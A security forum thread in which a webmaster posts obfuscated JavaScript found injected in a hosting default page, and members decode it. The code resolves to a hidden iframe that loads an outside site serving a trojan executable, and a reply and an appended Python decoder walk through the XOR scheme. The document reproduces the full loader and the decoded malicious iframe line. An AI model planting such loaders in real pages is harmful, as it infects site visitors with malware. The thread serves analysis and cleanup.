
Thread: Virus code on a webpage?

  1. #1

    Virus code on a webpage?

    I found this code lurking on one of my webpages that was mysteriously uploaded

    It downloads a trojan apparently each time a person visited a page on my site

    Does anyone know what this code is and what it translates to???


    <script>x=94;es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</script></body>

  2. #2
    nihil, Senior Member (joined Jul 2003; United Kingdom: Bridlington; 17,188 posts)
    It looks vaguely like the SCOB javascript trojan or some sort of variant?


  3. #3
    Computernerd22, AO's MMA Fanatic! (joined Mar 2003; Miami, FL; 795 posts)
    Originally posted here by siteprosecurity
    I found this code lurking on one of my webpages that was mysteriously uploaded
    Nihil. I tried giving you (+) points but

    You have given out too many AntiPoints today, try again later.
    So when I have the chance I will.

    Back to the issue at hand. Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com. Which page has the malicious code on it? I checked; it's not the index page? I also wanted to see what webserver is running your site.

    http://toolbar.netcraft.com/site_rep...rosecurity.com

  4. #4
    Originally posted here by Computernerd22
    Nihil. I tried giving you (+) points but

    So when I have the chance I will.

    Back to the issue at hand. Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com. Which page has the malicious code on it? I checked; it's not the index page? I also wanted to see what webserver is running your site.

    http://toolbar.netcraft.com/site_rep...rosecurity.com
    Hey!

    Actually, nah, it's not on the siteprosecurity site, don't have that no more. First time I've posted here in 2 yrs.

    It was actually on my webserver under the cPanel skeleton directory.

    I registered a domain name for a client today and have this default holding page for all new clients, and that code appeared somehow on the default holding page!

    I'm running Apache/Linux on my server!

    Cheers!

  5. #5


    It translates to:
    Code:
    <iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>
    That site then tries to load /xxx.ani, which in turn will go for: (sanitized URL)
    htXtp://www.bestswf.com/web.exe

    web.exe will use some code known as EliRT 1.01, which looks like rootkit stuff.

    VirusTotal doesn't like web.exe.

    Have fun nihil!

    edit...

    By the way, siteprosecurity, that means you've been owned.

  6. #6
    Hmm, thanks for that.

    OK, "owned" I guess means that some person has had access to the root of the server?

    Everything else seems to be intact and all, although last weekend I do remember the server suffering badly and all, but it's been OK since then?

    Anyone got tips to move on from here?

    I have rkhunter installed; it did not pick up anything.

  7. #7
    nihil, Senior Member (joined Jul 2003; United Kingdom: Bridlington; 17,188 posts)
    Hmmmmmmmmmmmm,

    EliRT 1.01 is a .dll injector.....................seems to be used by backdoor CIAdoor 124a

    It is a Russian website set up in November. It seems to be a privately owned domain, so I would imagine the purpose is fraud.

    A-Squared and EWIDO were NOT IMPRESSED ..................they have probably crossed me off their Christmas list

    The actual malware is Windows specific.

    You might try 020-7230-1212.....................the Fraud Squad are normally only interested in crimes over £75,000, but I suspect that these people are not conducting an academic exercise?

    This link may help:

    http://www.fraudaid.com/How-To-Deal-...otlandYard.htm

    I would guess that Interpol are the people to handle it in the end?

    Good luck

  8. #8
    Originally posted here by siteprosecurity
    hmm thanks for that

    ok owned i guess means that some person has had access to the root of the server?
    You probably have some hidden files located on the server. I've found them hidden in the recycle bins in the past, and in some of the OS system folders. I'd use the Sysinternals RootkitRevealer and do some safe-mode hunting. 'Course, the first thing is to change all the local admin passwords and domain passwords and check for odd new local accounts.

    [Edit]
    Or, if you take nihil's suggestion, just unplug from the net, isolate and wait for the forensics team.
    [/Edit]

  9. #9
    Just Another Geek (joined Jul 2002; Rotterdam, Netherlands; 3,401 posts)
    To find out how Soda_Popinsky got the <iframe> tag...

    (I'm going to assume Windows to find out what it does.)
    The piece of script is JavaScript. Copy 'n' paste the code into Notepad and save it as test.js.
    Then edit it a bit to make it more readable...

    Code:
    x=94;
    es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";
    var ds=new String();
    ads=es.split(";");
    k=ads.length-1;
    for(var j=0;j<k;j++){
       e=ads[j];
       gg="d=e";
       gg=gg+"^x";
       eval(gg);
       x+=1;
       ds=ds+String.fromCharCode(d);
    }
    
    WScript.Echo(ds)
    Change that last eval statement into a WScript.Echo (bold in the code) and run it with cscript.

    What it basically does is split the string es into its separate pieces. For the first one, e becomes 58. gg will contain d=e^x; x=94 at first. After the eval statement d=100 (d=58 XOR 94). You can change the whole gg=.... eval(gg) into d=e^x. Next it adds 1 to x for the next round. Then it converts the decimal 100 into its ASCII character (d) and adds it to ds. The last statement (eval; which I changed to WScript.Echo) executes the string ds (which at the end contains 'document.write('<iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>');').


    Originally posted here by siteprosecurity
    anyone got tips to move on from here?
    Yep. Back up all the important stuff and reinstall the server from scratch using the original installation CDs. Don't forget to patch it afterwards (and plug the hole they used to get in).
    Oliver's Law:
    Experience is something you don't get until just after you need it.
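    A static decoder for the XOR-chain loader that post #5 translates and post #9 walks through, added here as an example (not code from the thread or from any of its posters). It reproduces the loop in Python without eval, so the hidden string can be read rather than executed; SAMPLE_HTML is the script from post #1 wrapped for readability, and the function names and regex are my own.

```python
import re

# Constructed sample: the <script> from the thread's first post, wrapped for readability.
SAMPLE_HTML = (
    '<script>x=94;es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;'
    '5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;'
    '237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;'
    '147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;'
    '145;130;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++)'
    '{e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}'
    'eval(ds)</script></body>'
)

# Assumed pattern for the two parameters the loader needs: the start key and the byte list.
PARAM_RE = re.compile(r'x=(\d+);\s*es="([\d;]+)"')


def decode_xor_chain(values, key):
    """Replicate the script's loop without eval: each value is XORed with a key
    that starts at `key` and increases by one per character."""
    chars = []
    for v in values:
        chars.append(chr(v ^ key))
        key += 1
    return "".join(chars)


def extract_params(html):
    """Return (start_key, value_list) if the loader pattern is present, else None.
    Empty tokens (from the trailing ';') are dropped, mirroring the k=ads.length-1 bound."""
    m = PARAM_RE.search(html)
    if m is None:
        return None
    values = [int(tok) for tok in m.group(2).split(";") if tok]
    return int(m.group(1)), values


def decode_from_html(html):
    """Decode the hidden payload statically so it can be read, never executed."""
    params = extract_params(html)
    if params is None:
        return None
    key, values = params
    return decode_xor_chain(values, key)


if __name__ == "__main__":
    print(decode_from_html(SAMPLE_HTML))
```

    Run against a page the same way rkhunter would not catch it: the loader lives in the HTML, not in a system binary, so grep the web root for the x=NN;es=" pattern rather than the filesystem for rootkits.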

  10. #10
    Senior Member (joined Dec 2004; 320 posts)
    Well, I gotta ask. Couldn't this (and most likely) be an XSS attack? I don't know if they compromised root... On your web page(s), do you use any .php or .asp or anything similarly dynamic? Are you sure it was an 'uploaded' page and not XSS?
    The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare
